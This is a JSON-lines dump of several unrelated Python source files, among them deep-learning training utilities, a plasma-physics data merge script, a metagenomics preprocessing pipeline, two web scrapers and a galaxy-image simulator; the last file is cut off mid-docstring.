public=app.config['DISALLOW_PRIVATE'])\n\n\ndef _get_manager() -> WebManager:\n \"\"\"Get the manager from the app.\"\"\"\n _manager = current_app.extensions.get('manager')\n if _manager is None:\n raise RuntimeError(\n 'The manager was not registered to the app yet.'\n ' Make sure to call PyBELSQLAlchemy.init_app()',\n )\n return _manager\n\n\ndef _get_user_datastore() -> SQLAlchemyUserDatastore:\n return _get_manager().user_datastore\n\n\nmanager: WebManager = LocalProxy(_get_manager)\nuser_datastore: SQLAlchemyUserDatastore = LocalProxy(_get_user_datastore)\nbutler = LocalProxy(lambda: user_datastore.find_user(email=current_app.config['BUTLER_EMAIL']))\n","sub_path":"src/bel_commons/core/sqlalchemy.py","file_name":"sqlalchemy.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"85783287","text":"import os\nimport json\nimport cv2\nimport torch\nimport random\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\n\nfrom torch.utils.data import Dataset\nfrom .transform import augmentation, trans\n\n\nclass CenterLoss(nn.Module):\n def __init__(self):\n super(CenterLoss, self).__init__()\n self.l2_loss = nn.MSELoss(reduction='sum')\n\n def forward(self, outputs, targets):\n return self.l2_loss(outputs, targets) / outputs.size(0)\n\n\nclass Metric(object):\n pass\n\n\nclass AverageMeter(Metric):\n def __init__(self, name='loss'):\n self.name = name\n self.reset()\n\n def reset(self):\n self.scores = 0.\n self.total_num = 0.\n\n def __call__(self, batch_score, sample_num=1):\n self.scores += batch_score\n self.total_num += sample_num\n return self.scores / self.total_num\n\n\nclass TopKAccuracyMetric(Metric):\n def __init__(self, topk=(1,)):\n self.name = 'topk_accuracy'\n self.topk = topk\n self.maxk = max(topk)\n self.reset()\n\n def reset(self):\n self.corrects = np.zeros(len(self.topk))\n self.num_samples = 0.\n\n def __call__(self, output, target):\n self.num_samples += target.size(0)\n _, pred = output.topk(self.maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n for i, k in enumerate(self.topk):\n correct_k = correct[:k].view(-1).float().sum(0)\n self.corrects[i] += correct_k.item()\n\n return self.corrects * 100. 
/ self.num_samples\n\n\nclass Callback(object):\n def __init__(self):\n pass\n\n def on_epoch_begin(self):\n pass\n\n def on_epoch_end(self, *args):\n pass\n\n\nclass ModelCheckpoint(Callback):\n def __init__(self, savepath, monitor='val_topk_accuracy', mode='max'):\n self.savepath = savepath\n self.monitor = monitor\n self.mode = mode\n self.reset()\n super(ModelCheckpoint, self).__init__()\n\n def reset(self):\n if self.mode == 'max':\n self.best_score = float('-inf')\n else:\n self.best_score = float('inf')\n\n def set_best_score(self, score):\n if isinstance(score, np.ndarray):\n self.best_score = score[0]\n else:\n self.best_score = score\n\n def on_epoch_begin(self):\n pass\n\n def on_epoch_end(self, logs, net, **kwargs):\n current_score = logs[self.monitor]\n if isinstance(current_score, np.ndarray):\n current_score = current_score[0]\n\n if (self.mode == 'max' and current_score > self.best_score) or \\\n (self.mode == 'min' and current_score < self.best_score):\n self.best_score = current_score\n\n if isinstance(net, torch.nn.DataParallel):\n state_dict = net.module.state_dict()\n else:\n state_dict = net.state_dict()\n for key in state_dict.keys():\n state_dict[key] = state_dict[key].cpu()\n\n if 'feature_center' in kwargs:\n feature_center = kwargs['feature_center']\n feature_center = feature_center.cpu()\n\n torch.save({\n 'logs': logs,\n 'state_dict': state_dict,\n 'feature_center': feature_center}, self.savepath)\n else:\n torch.save({\n 'logs': logs,\n 'state_dict': state_dict}, self.savepath)\n\n\ndef get_transform(resize, phase='train'):\n if phase == 'train':\n return transforms.Compose([\n transforms.Resize(\n size=(int(resize[0] / 0.875), int(resize[1] / 0.875))),\n transforms.RandomCrop(resize),\n transforms.RandomHorizontalFlip(0.5),\n transforms.ColorJitter(brightness=0.126, saturation=0.5),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n else:\n return transforms.Compose([\n transforms.Resize(\n size=(int(resize[0] / 0.875), int(resize[1] / 0.875))),\n transforms.CenterCrop(resize),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n\n\ndef batch_augment(images, attention_map, mode='crop', theta=0.5,\n padding_ratio=0.1):\n batches, _, imgH, imgW = images.size()\n if mode == 'crop':\n crop_images = []\n for batch_index in range(batches):\n atten_map = attention_map[batch_index:batch_index + 1]\n if isinstance(theta, tuple):\n theta_c = random.uniform(*theta) * atten_map.max()\n else:\n theta_c = theta * atten_map.max()\n crop_mask = F.upsample_bilinear(atten_map,\n size=(imgH, imgW)) >= theta_c\n nonzero_indices = torch.nonzero(crop_mask[0, 0, ...])\n height_min = max(\n int(nonzero_indices[:, 0].min().item() - padding_ratio * imgH),\n 0)\n height_max = min(\n int(nonzero_indices[:, 0].max().item() + padding_ratio * imgH),\n imgH)\n width_min = max(\n int(nonzero_indices[:, 1].min().item() - padding_ratio * imgW),\n 0)\n width_max = min(\n int(nonzero_indices[:, 1].max().item() + padding_ratio * imgW),\n imgW)\n crop_images.append(\n F.upsample_bilinear(images[batch_index:batch_index + 1, :,\n height_min:height_max, width_min:width_max],\n size=(imgH, imgW)))\n crop_images = torch.cat(crop_images, dim=0)\n return crop_images\n elif mode == 'drop':\n drop_masks = []\n for batch_index in range(batches):\n atten_map = attention_map[batch_index:batch_index + 1]\n if isinstance(theta, tuple):\n theta_d = random.uniform(*theta) * atten_map.max()\n 
else:\n theta_d = theta * atten_map.max()\n drop_masks.append(\n F.upsample_bilinear(atten_map, size=(imgH, imgW)) < theta_d)\n drop_masks = torch.cat(drop_masks, dim=0)\n drop_images = images * drop_masks.float()\n return drop_images\n\n\nclass DfdcDataset(Dataset):\n\n def __init__(self, datapath=\"\", phase='train', resize=(300, 300)):\n assert phase in ['train', 'val', 'test']\n if phase == 'val':\n phase = 'valid'\n self.phase = phase\n self.resize = resize\n self.num_classes = 2\n self.epoch = 0\n self.next_epoch()\n self.aug = augmentation\n self.trans = trans\n self.datapath = datapath\n\n def next_epoch(self):\n with open('../dfdc.json') as f:\n dfdc = json.load(f)\n if self.phase == 'train':\n trainset = dfdc['train']+dfdc['valid']\n tr = list(filter(lambda x: x[1] == 0, trainset))\n tf = random.sample(list(filter(lambda x: x[1] == 1, trainset)), len(tr))\n self.dataset = tr+tf\n if self.phase == 'valid':\n validset = dfdc['test']\n tr = list(filter(lambda x: x[1] == 0, validset))\n tf = random.sample(list(filter(lambda x: x[1] == 1, validset)), len(tr))\n self.dataset = tr+tf\n if self.phase == 'test':\n self.dataset = dfdc['test']\n self.epoch += 1\n\n def __getitem__(self, item):\n try:\n vid = self.dataset[item // 20]\n ind = str(item % 20 * 12 + self.epoch % 12)\n ind = '0'*(3-len(ind))+ind+'.png'\n image = cv2.imread(os.path.join(self.datapath, vid[0], ind))\n image = cv2.resize(cv2.cvtColor(image, cv2.COLOR_BGR2RGB),\n self.resize)\n if self.phase == 'train':\n image = self.aug(image=image)['image']\n return self.trans(image), vid[1]\n except:\n return self.__getitem__((item + 250) % (self.__len__()))\n\n def __len__(self):\n return len(self.dataset) * 20\n\n","sub_path":"utils/wsdan.py","file_name":"wsdan.py","file_ext":"py","file_size_in_byte":8334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"208786024","text":"\"\"\" Script to merge a list of diagnostics and summary values into a data dictionary dd\nUsage\ndd=numpy.load('pyfusion/90091_MP2012_384_rms_1.npz')['dd'].tolist()\nrun -i pyfusion/examples/merge_in_basic_params.py\n optional arguments \n exception=None suppress no exceptions (for debugging)\n debug set to 1 or higher to activate breakpoints\n diags List of diagnostic names as defined in the info ditcionary (below is a shorthand)\n diags=\",b_0,i_p,di_pdt,w_p,dw_pdt,dw_pdt2,beta,NBI\".split(',')\n\nNote: as of 14 Feb 2013, missing shot count is always []\n\n===Earlier notes during development=== (obsolete now)\nshot 46365, time 1.967 s\n\nfsfile='54194.txt'\ntime run -i pyfusion/examples/plot_text_pyfusion.py\ntim=ds['t_mid']\nrun -i pyfusion/examples/get_basic_params.py times=tim shots=[54194]\nrun -i pyfusion/examples/merge_in_basic_params.py\n\nfsfile='/c/cygwin/home/bdb112/python/daves/pyfusion/MP512all.txt'\ntime run -i pyfusion/examples/plot_text_pyfusion.py\ntim=ds['t_mid']\nrun -i pyfusion/examples/get_basic_params.py times=tim shots=[54194]\nrun -i pyfusion/examples/merge_in_basic_params.py\ndd=load('fridd.npy').tolist()\nrun -i pyfusion/examples/test_lasso_fs.py\n#save('fridd',dd)\nfor k in dd.keys(): exec(\"{0}=array(dd['{0}'])[:]\".format(k))\nw=where(beta>1)[0]\ndebug=0\nsp(dd,'freq','beta','amp', size_scale=10000,hold=0, ind=w,col='t_mid',marker='s')\nY\nsp(dd,'t_mid','freq','amp', size_scale=10000,hold=0, ind=w,col='beta',marker='s')\nY\ncolorbar()\nind=w\nrun -i pyfusion/examples/test_lasso_fs.py\n=====\n\n\n\"\"\"\nimport pyfusion\npyfusion.DEBUG=0\n\nfrom pyfusion.data.DA_datamining 
import DA\n#DAJ = DA('DA131128_HJ_ALL_50_52.npz',load=1)\n#dd=DAJ.da\n\n\n\nimport os.path\nimport numpy as np\nfrom pyfusion.acquisition.HeliotronJ.get_basic_diagnostics import get_basic_diagnostics, get_flat_top\n\ndebug=0\nexception = IOError\nexception = (IOError, LookupError, ValueError)\n\n#dd={}\n#for name in ds.dtype.names: dd.update({name: ds[name]})\ndiags=\",b_0,i_p,di_pdt,w_p,dw_pdt,dw_pdt2,beta,NBI\".split(',')\ndiags=\"b_0,w_p,dw_pdt,dw_pdt2,beta,NBI\".split(',')\n# diag _extra are the ones more likely to fail\ndiag_basic=\"IBTA,IBTB,IBHV,IBAV,IBIV,b_0\".split(',')\ndiag_extra=\"n_e19b0,n_e19dL5,ech,NBI\".split(',')\ndiag_extra=\"DIA135,MICRO01,NBIS3I,NBIS4I\".split(',')\nminshot=0\nmaxshot=999999 # higher than even LHD\nshot_list = []\ndiags=diag_basic\ndiags_scalar=\"b_0,R_ax,Quad,Gamma\".split(',')\nmaxcpu=0.5\n\nimport pyfusion.utils\nexec(pyfusion.utils.process_cmd_line_args())\n# now to merge the two.\nif len(np.shape(diags)) == 0: diags = [diags]\n\nsz = len(dd['shot'])\nmissing_shots = []\ngood_shots =[]\n\nctr=0\n\nregulator = pyfusion.utils.Regulator(maxcpu)\n \nif len(shot_list)==0:\n shots = np.unique(dd['shot'])\n wgt = np.where((shots >= minshot) & (shots <= maxshot))\n shot_list = shots[wgt]\n\nfor shot in shot_list:\n regulator.wait()\n # ws is the set of indices corresponding to the shot\n ws = np.where(shot == dd['shot'])[0]\n if len(ws)==0: # this is an impossible condition!\n raise LookupError('Impossible! could not find the expected shot {0}'.\n format(shot))\n else: \n try:\n times = dd['t_mid'][ws]\n basic_data = get_basic_diagnostics(diags,shot=shot,times=times,debug=1)\n if 'w_p' in diags: # omit all this if not asked for w_p (to make sure we get Bo)\n (tstart,tend,inds) = get_flat_top(times=None, shot=shot) # None important\n flat_level = times*0\n w=np.where((times>tstart) & (times0: print(\"len = {0}\".format(len(w)))\n basic_data.update({'flat_level': flat_level})\n\n good_shots.append(shot)\n except exception as details:\t\t\n missing_shots.append(shot)\n basic_data={}\n pyfusion.logging.warning(\"shot {s} not processed for diags, {info} {args}\"\n .format(s=shot, info=details, args=details.args))\n\n if basic_data != {}:\n #bsign = np.sign(basic_data['b_0'][0]) # no need to correct so far\n # not used yet - maybe use for phases.\n for key in basic_data.keys():\n if debug>0: print(key)\n if key in dd:\n ctr += 1\n if np.mod(ctr,10) == 0: \n print('\\nMerging in key {0} {1}'.format(key, shot)),\n else:\n print(key),\n else: \n print('Creating new key {0}'.format(key)) \n dd.update({key: (np.zeros(sz)+np.nan).astype(pyfusion.prec_med)})\n\n #store it at the corresponding indices\n\n if key in ['not-yet']:#['w_p','i_p','dw_pdt','dw_pdt2','di_pdt']:\n # this probably doesn't need astype (as it is a scatter)\n dd[key][ws] = bsign*basic_data[key].astype(pyfusion.prec_med)\n \n else:\n dd[key][ws] = basic_data[key].astype(pyfusion.prec_med)\n if debug: print('{key}: avg={a:.3g}'.\n format(key=key,a=np.average(dd[key][ws]))),\n\ntry:\n filename\nexcept:\n filename='ddfile'\n print('filename defaulting to ', filename)\n\nsave_name = 'saved_'+os.path.splitext(os.path.split(filename)[1])[0]\nprint('Saving as {0}'.format(save_name))\n#np.save(save_name,dd)\n\nprint(\"{0} missing shots out of {1}\".format(len(missing_shots),(len(missing_shots)+len(good_shots))))\n\nif verbose>0: print('missing shots are {0}'.format(missing_shots))\n\nfor key in diags:\n print('{0:10s}: {1:.1f}%'.format(key, 100.0*np.sum(dd[key]*0==0)/sz))\n uv = np.unique(dd[key])\n if 
len(uv) < 10:\n print('key {key} has very few ({n}) different values: \\n{uv}'\n .format(key=key,n=len(uv),uv=uv))\n","sub_path":"pyfusion/examples/merge_basic_HJ_diagnostics.py","file_name":"merge_basic_HJ_diagnostics.py","file_ext":"py","file_size_in_byte":5878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"56960188","text":"def plus_minus(arr):\n if not arr:\n return\n\n pos, neg, zero = 0, 0, 0\n l = len(arr)\n\n for num in arr:\n if not num:\n zero += 1\n elif num > 0:\n pos += 1\n else:\n neg += 1\n\n print(pos / l)\n print(neg / l)\n print(zero / l)\n","sub_path":"algorithms/warmup/PlusMinus.py","file_name":"PlusMinus.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"490521548","text":"#coding:utf-8\nfrom __future__ import print_function\nimport glob,os,re,argparse\nimport pandas as pd\n\n\ndef m1_fastqc(ALL_list,nnodes):\n \"\"\"\n :ALL_list: the string of all the paths of fastqc files '/'.\n :return: None\n \"\"\" \n if not os.path.isdir('fastqc_out'):\n print('Input folder is not exist; mkdir now.')\n os.system('mkdir fastqc_out')\n os.system('fastqc -t %s %s -o fastqc_out/' % (nnodes, ALL_list))\n else:\n print('fastqc step is skipped.')\n\ndef m2_run_kneaddata(nnodes, F_list, R_list, script_path):\n \"\"\"\n :nnodes: the number of nodes to parallel\n :F_list: the string of all the paths of forward fastqc files '/'.\n :R_list: the string of all the paths of paired reverse fastqc files '/'.\n :script_path: the path of custome script, default is /home/yxtan/HUMANN2_SOP_scripts/\n :return: None\n \"\"\"\n #2.1 Running KneadData\n #Use kneaddata to run pre-processing tools. First Trimmomatic is run to remove low quality sequences. Then Bowtie2 is run to screen out contaminant sequences. Below we are screening out reads that map to the human or PhiX genomes. Note KneadData is being run below on all unstitched FASTQ pairs with parallel, you can see our quick tutorial on this tool here. For a detailed breakdown of the options in the below command see this page. The forward and reverse reads will be specified by \"_1\" and \"_2\" in the output files, ignore the \"R1\" in each filename. 
Note that the \\ characters at the end of each line are just to split the command over multiple lines to make it easier to read.\n #the order of quotes are extremely important here.\n os.system('mkdir kneaddata_out')\n os.system(\"parallel -j %s --link 'kneaddata -i {1} -i {2} -o kneaddata_out/ \\\n -db /home/junyuchen/Databases/GRCh38_PhiX_bowtie2_index/GRCh38_PhiX --trimmomatic /home/junyuchen/Biosoft/anaconda3/envs/humann2/share/trimmomatic-0.39-1/ \\\n -t 4 --trimmomatic-options \\\"SLIDINGWINDOW:4:20 MINLEN:50\\\" \\\n --bowtie2-options \\\"--very-sensitive --dovetail\\\" --remove-intermediate-output' \\\n ::: %s ::: %s\" % (nnodes, F_list, R_list))\n #Clean up the output directory (helps downstream commands) by moving the discarded sequences to a subfolder:\n os.system('mkdir -p kneaddata_out/contam_seq')\n os.system('mv kneaddata_out/*_contam*.fastq kneaddata_out/contam_seq')\n #You can produce a logfile summarizing the kneadData output with this command:\n os.system('kneaddata_read_count_table --input kneaddata_out --output kneaddata_read_counts.txt')\n #2.2 Concatenate unstitched output \n #os.system('perl %s/concat_paired_end.pl -p %s --no_R_match -o cat_reads kneaddata_out/*_paired_*.fastq' % (script_path, nnodes)) \n\ndef m2_run_kneaddata_single(nnodes, F_list,script_path):\n \"\"\"\n :nnodes: the number of nodes to parallel\n :F_list: the string of all the paths of forward fastqc files '/'.\n :script_path: the path of custome script, default is /home/yxtan/HUMANN2_SOP_scripts/\n :return: None\n \"\"\"\n #2.1 Running KneadData\n #Use kneaddata to run pre-processing tools. First Trimmomatic is run to remove low quality sequences. Then Bowtie2 is run to screen out contaminant sequences. Below we are screening out reads that map to the human or PhiX genomes. Note KneadData is being run below on all unstitched FASTQ pairs with parallel, you can see our quick tutorial on this tool here. For a detailed breakdown of the options in the below command see this page. The forward and reverse reads will be specified by \"_1\" and \"_2\" in the output files, ignore the \"R1\" in each filename. 
Note that the \\ characters at the end of each line are just to split the command over multiple lines to make it easier to read.\n #the order of quotes are extremely important here.\n os.system('mkdir kneaddata_out')\n os.system(\"parallel -j %s 'kneaddata -i {1} -o kneaddata_out/ \\\n -db /home/junyuchen/Databases/GRCh38_PhiX_bowtie2_index/GRCh38_PhiX --trimmomatic /home/junyuchen/Biosoft/anaconda3/envs/humann2/share/trimmomatic-0.39-1/ \\\n -t 4 --trimmomatic-options \\\"SLIDINGWINDOW:4:20 MINLEN:50\\\" \\\n --bowtie2-options \\\"--very-sensitive --dovetail\\\" --remove-intermediate-output' \\\n ::: %s \" % (nnodes, F_list))\n #Clean up the output directory (helps downstream commands) by moving the discarded sequences to a subfolder:\n os.system('mkdir -p kneaddata_out/contam_seq')\n os.system('mv kneaddata_out/*_contam*.fastq kneaddata_out/contam_seq')\n #You can produce a logfile summarizing the kneadData output with this command:\n os.system('kneaddata_read_count_table --input kneaddata_out --output kneaddata_read_counts.txt')\n #2.2 Concatenate unstitched output \n #os.system('mkdir cat_reads/')\n #os.system('mv kneaddata_out/*kneaddata.fastq cat_reads/') \n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input', dest='rd', type=str, required=True,\n help=\"the tabular-table contains paths of the raw data\")\n parser.add_argument('-n', '--node', dest='node', type=str, required=False, default='20',\n help=\"the number of nodes to request\")\n parser.add_argument('-sp', '--spath',dest='sp', type=str, required=False, default='/home/junyuchen/Lab/Meta-Analysis/Scripts/',\n help=\"path of the custom scripts\")\n parser.add_argument('-e', '--pair', dest='pair', type=str, required=False, default='True',\n help=\"Is it pair-end seq data? Default is 'True'; Any other strings will be considered False\")\n parser.add_argument('-j', '--jobs', dest='jobs', type=str, required=False, default='8',\n help=\"The number of jobs run parallell in humann2 step. Default is '8'; It is bounded by the total number of memory available. Each job should have 16GB memory\")\n args = parser.parse_args()\n print('Usage example with minimum parameters: python /home/yxtan/HUMANN2_SOP_scripts/Metagenomics_HUMANN2.py -i sample_table.txt -n 4')\n rd_dir = os.path.abspath(args.rd)\n script_path = os.path.abspath(args.sp)\n pair_end = args.pair\n nnodes = args.node\n njobs = args.jobs\n \n #需要检查输入的参数是否正确,主要是路径是否存在 \n if not os.path.isfile(rd_dir):\n print('Input sample table is not exist; Exit now.')\n exit(0)\n if not os.path.isdir(script_path):\n print('The folder of custom scripts is not exist; Exit now.')\n exit(0)\n\n #1. First Steps\n #1.1 Generate the list of samples\n #rd_dir = \"example_data_file.txt\"\n print(rd_dir)\n df = pd.read_csv(rd_dir, sep='\\t')\n F_list = df[\"forward-absolute-filepath\"].tolist() \n R_list = df[\"reverse-absolute-filepath\"].tolist() \n print(R_list[1])\n print(F_list[1])\n #print(Counter)\n #1.2 Inspect read quality\n #if pair_end == 'True':\n # m1_fastqc(ALL_list,nnodes)\n #else:\n # m1_fastqc(F_list,nnodes)\n \n #2. Read Quality-Control and Contaminant Screens and connect to a long read\n #if pair_end == 'True':\n m2_run_kneaddata(nnodes, F_list, R_list, script_path)\n #else:\n # m2_run_kneaddata_single(nnodes, F_list,script_path)\n \n #3. 
Determine Functions with HUMAnN2\n #m3_humann2(nnodes, script_path,njobs)\n\n\n\n\n\n\n","sub_path":"Scripts/humann2_old/Metagenomics_HUMANN2_pre.py","file_name":"Metagenomics_HUMANN2_pre.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"426315085","text":"from bs4 import BeautifulSoup\n\nimport re\n\nfrom src.imooc.spider_four_famous_novels_180524.html_downloader import HtmlDownloader\n\n\nclass UrlManager(object):\n\n # 获取各个小说的index's url\n def get_all_novel_urls(self, url):\n novel_urls = []\n\n html = HtmlDownloader().download(url)\n soup = BeautifulSoup(html, 'html.parser')\n novel_nodes = soup.find_all('a', href=re.compile(r\"(.*)/index.htm\"))\n for novel in novel_nodes:\n novel_urls.append('http://www.purepen.com/' + novel['href'])\n\n return novel_urls\n\n # 获取指定小说对应的各章节url\n def get_chapter_urls(self, url):\n chapter_urls = []\n\n text = HtmlDownloader().download(url)\n soup = BeautifulSoup(text, 'html.parser')\n\n title_node = soup.find('title').text\n chapter_nodes = soup.find_all('a', href=re.compile(r\"(\\d).htm\"))\n for chapter in chapter_nodes:\n chapter_urls.append(url.replace('index.htm', chapter['href']))\n\n return chapter_urls\n","sub_path":"py_pure/src/imooc/spider_four_famous_novels_180524/url_manager.py","file_name":"url_manager.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"317045415","text":"from splinter import Browser\nfrom bs4 import BeautifulSoup as bs\nimport time\nimport pandas as pd\nimport pymongo\nimport requests\n\ndef init_browser():\n executable_path = {\"executable_path\": \"C:/Users/arodr/Documents/bootcamp/nu-chi-data-pt-04-2021-u-c/web-scraping-challenge/Mission to Mars/chromedriver.exe\"}\n return Browser(\"chrome\", **executable_path, headless=False)\n\ndef scrape_info():\n browser = init_browser()\n\n time.sleep(1)\n\n #mars news\n\n news_url = 'https://redplanetscience.com/'\n browser.visit(news_url)\n \n html = browser.html\n soup = bs(html, 'html.parser')\n\n news_title=soup.find(\"div\",class_='content_title').text\n\n news_p=soup.find(\"div\",class_='article_teaser_body').text\n\n #JPL Mars Space Images\n\n url = 'https://spaceimages-mars.com/image/mars/Icaria%20Fossae7.jpg'\n browser.visit(url)\n\n html = browser.html\n soup = bs(html, 'html.parser')\n\n stuff=soup.find('div',class_='carousel_container')\n\n image=stuff.a[\"data-fancybox-href\"]\n\n url=\"https://spaceimages-mars.com/\"\n\n featured_image_url = url + image\n\n #Mars Weather\n\n url = 'https://twitter.com/marswxreport?lang=en&lang=en&lang=en'\n browser.visit(url)\n\n html = browser.html\n soup = bs(html, 'html.parser')\n\n mars_weather=soup.find('p',class_='TweetTextSize TweetTextSize--normal js-tweet-text tweet-text').text\n\n #Mars Facts\n facts_url = 'https://galaxyfacts-mars.com/'\n browser.visit(facts_url)\n\n html=browser.html\n soup=bs(html, 'html.parser')\n \n tables = pd.read_html(facts_url)\n\n mars_df=tables[1]\n mars_df.columns=[\"description\",\"value\"]\n mars_df.set_index(\"description\",inplace=True)\n\n mars_html_table=mars_df.to_html()\n mars_html_table.replace('\\n','')\n \n\n #Mars Hemispheres\n url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n browser.visit(url)\n\n html = browser.html\n soup = bs(html, 'html.parser')\n\n all_hemi1=soup.find(\"div\",class_='collapsible results')\n\n 
hemisphere1=all_hemi1.find_all('a')\n\n hemisphere_image_urls=[]\n\n for hemi in hemisphere1:\n if hemi.h3:\n title=hemi.h3.text\n link=hemi[\"href\"]\n main_url=\"https://astrogeology.usgs.gov/\"\n forward_url=main_url+link\n browser.visit(forward_url)\n html = browser.html\n soup = bs(html, 'html.parser')\n hemi2=soup.find(\"div\",class_= \"downloads\")\n image=hemi2.ul.a[\"href\"]\n hemi_dict={}\n hemi_dict[\"title\"]=title\n hemi_dict[\"img_url\"]=image\n hemisphere_image_urls.append(hemi_dict)\n browser.back()\n\n\n mars_py_dict={\n \"mars_news_title\": news_title,\n \"mars_news_paragraph\": news_p,\n \"featured_mars_image\": featured_image_url,\n \"mars_weather\": mars_weather,\n \"mars_facts\": mars_html_table,\n \"mars_hemisphers\": hemisphere_image_urls\n }\n browser.quit()\n\n return mars_py_dict ","sub_path":"Mission to Mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"79035239","text":"def helper(candidates, index, results, chosen=\"\"):\n ## Base Case\n if index == len(candidates) - 1: \n results.append(chosen)\n return\n else: \n for i in range(index, len(candidates) - 1):\n helper(candidates, index + 1, results, chosen+candidates[index])\n\n print (results)\n \ndef letterCombinations(digits):\n \"\"\"\n :type digits: str\n :rtype: List[str]\n \"\"\"\n lettersDictionary = {}\n lettersDictionary[\"2\"] = \"abc\"\n lettersDictionary[\"3\"] = \"def\"\n lettersDictionary[\"4\"] = \"ghi\"\n lettersDictionary[\"5\"] = \"jkl\"\n lettersDictionary[\"6\"] = \"mno\"\n lettersDictionary[\"7\"] = \"pqrs\"\n lettersDictionary[\"8\"] = \"tuv\"\n lettersDictionary[\"9\"] = \"wyxz\"\n \n results = []\n candidates = []\n for i in range(2, len(digits) + 2):\n letters = list(lettersDictionary[str(i)])\n for letter in letters:\n candidates.append(letter)\n \n \n helper(candidates, 0, results, \"\")\n\nif __name__ == \"__main__\":\n letterCombinations(\"23\")","sub_path":"Leetcode/recursion/lettersCombination.py","file_name":"lettersCombination.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"518010994","text":"\"\"\"\r\nSimulator: Sample Power-Law\r\n===========================\r\n\r\nThis script simulates a sample of `Imaging` datasets of galaxies where:\r\n\r\n - The galaxy's bulge is an `Sersic`.\r\n - The galaxy's disk is an `Sersic`.\r\n\r\nTo simulate the sample of galaxies, each galaxy is set up as a `Model` such that its parameters are drawn from\r\ndistributions defined via priors.\r\n\r\n__Sample Simulation__\r\n\r\nThe dataset fitted in this example script is simulated imaging data of a sample of 3 galaxies.\r\n\r\nThis data is not automatically provided with the autogalaxy workspace, and must be first simulated by running the\r\nscript `autogalaxy_workspace/scripts/simulators/imaging/samples/sersic_sersic.py`.\r\n\r\n__Uses__\r\n\r\nThis script is used in the graphical model tutorial `tutorial_6_science_case`, to demonstrate how the `sersic_index`\r\nparameters of bulge and disks in a sample of galaxies can be estimated hierarchically.\r\n\r\n__Light SNR Profiles__\r\n\r\nThis script uses the signal-to-noise based light profiles described in the\r\nscript `imaging/simulators/misc/manual_signal_to_noise_ratio.ipynb`, to make it straight forward to ensure every galaxy\r\nis visible in each image.\r\n\"\"\"\r\n# %matplotlib inline\r\n# from 
pyprojroot import here\r\n# workspace_path = str(here())\r\n# %cd $workspace_path\r\n# print(f\"Working Directory has been set to `{workspace_path}`\")\r\n\r\nfrom os import path\r\nimport autofit as af\r\nimport autogalaxy as ag\r\nimport autogalaxy.plot as aplt\r\n\r\n\"\"\"\r\n__Dataset Paths__\r\n\r\nThe `dataset_type` describes the type of data being simulated (in this case, `Imaging` data) and `dataset_sample_name`\r\ngives a descriptive name to the sample. \r\n\r\nThis data is not automatically provided with the autogalaxy workspace, and must be first simulated by running the \r\nscript `autogalaxy_workspace/scripts/simulators/imaging/samples/sersic_sersic.py`. \r\n\"\"\"\r\ndataset_label = \"samples\"\r\ndataset_type = \"imaging\"\r\ndataset_sample_name = \"sersic_sersic\"\r\n\r\n\"\"\"\r\nThe path where the dataset will be output, which in this case is:\r\n`/autogalaxy_workspace/dataset/imaging/sample/light_sersic_sersic_0`\r\n\"\"\"\r\ndataset_path = path.join(\"dataset\", dataset_type, dataset_label, dataset_sample_name)\r\n\r\n\"\"\"\r\n__Simulate__\r\n\r\nFor simulating an image of a galaxy, we use the Grid2DIterate object.\r\n\"\"\"\r\ngrid = ag.Grid2DIterate.uniform(\r\n shape_native=(150, 150),\r\n pixel_scales=0.1,\r\n fractional_accuracy=0.9999,\r\n sub_steps=[2, 4, 8, 16, 24],\r\n)\r\n\r\ngrid = ag.Grid2D.uniform(shape_native=(150, 150), pixel_scales=0.1)\r\n\r\n\"\"\"\r\nSimulate a simple Gaussian PSF for the image.\r\n\"\"\"\r\npsf = ag.Kernel2D.from_gaussian(\r\n shape_native=(11, 11), sigma=0.1, pixel_scales=grid.pixel_scales\r\n)\r\n\r\n\"\"\"\r\nTo simulate the `Imaging` dataset we first create a simulator, which defines the exposure time, background sky,\r\nnoise levels and psf of the dataset that is simulated.\r\n\"\"\"\r\nsimulator = ag.SimulatorImaging(\r\n exposure_time=300.0, psf=psf, background_sky_level=0.1, add_poisson_noise=True\r\n)\r\n\r\n\"\"\"\r\n__Sample Model Distributions__\r\n\r\nTo simulate a sample, we draw random instances of galaxies where the parameters of their light profiles are drawn from \r\ndistributions. 
